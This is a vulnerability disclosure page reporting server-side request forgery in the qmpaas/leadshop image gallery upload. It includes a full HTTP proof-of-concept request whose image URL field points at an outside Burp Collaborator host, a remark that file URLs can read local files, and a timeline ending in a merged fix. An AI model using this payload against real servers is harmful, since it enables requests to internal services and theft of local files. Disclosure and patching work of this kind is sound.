Server-Side Request Forgery via upload image gallery in qmpaas/leadshop

Valid

Reported on

May 26th 2022


Description

Upload image to gallery, the server use file_get_contents function to load image via data scheme url, so attacker can modify this url to any URL like http to send ability request to any URL , and file to read local file, ...

Proof of Concept

POST /index.php?q=/api/leadmall/gallery HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyJ9.eyJpc3MiOiJodHRwOlwvXC9sb2NhbGhvc3QiLCJhdWQiOiJodHRwOlwvXC9sb2NhbGhvc3QiLCJqdGkiOiI5OGMwOGMyNWY4MTM2ZDU5MGMiLCJpYXQiOjE2NTM1ODIzNjIsImV4cCI6MTY1NjE3NDM2MiwiaWQiOjF9.leK1uig5bqE77ZcsCd6kaNpaMwz7SkPjuq38eHrytj8
QM-APP-TYPE: undefined
QM-APP-ID: 98c08c25f8136d590c
QM-APP-SECRET: 3AYpU16dZ1CY7ejqvrE39B351vanLJVD
Content-Length: 162
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?r=admin%2Findex
Cookie: _csrf=6173ae085358868d37d1217a51c7fa0d0f4e8f4ff1bc5c02ee4821b0ef541f40a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22ldQlSO9tUQ9FAJbS1H3lDUd-3qdmZFnP%22%3B%7D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-PwnFox-Color: blue

{"type":1,"group_id":-1,"content":"http://ysuel0pxqg3wvmaizyvshw83ouuki9.burpcollaborator.net/ssrf","title":"280864382_542263584214444_7204343006064197991_n.jpg"}

Image PoC

image

Impact

A successful SSRF attack can often result in unauthorized actions or access to data within the organization.

We are processing your report and will contact the qmpaas/leadshop team within 24 hours. 2 months ago
We have contacted a member of the qmpaas/leadshop team and are waiting to hear back 2 months ago
We have sent a follow up to the qmpaas/leadshop team. We will try again in 7 days. 2 months ago
We have sent a second follow up to the qmpaas/leadshop team. We will try again in 10 days. 2 months ago
We have sent a third and final follow up to the qmpaas/leadshop team. This report is now considered stale. 2 months ago
leadshop开源商城 modified the Severity from Critical (9.1) to High (8.2) a month ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
leadshop开源商城 validated this vulnerability a month ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
leadshop开源商城 confirmed that a fix has been merged on 44dba1 a month ago
leadshop开源商城 has been awarded the fix bounty
to join this conversation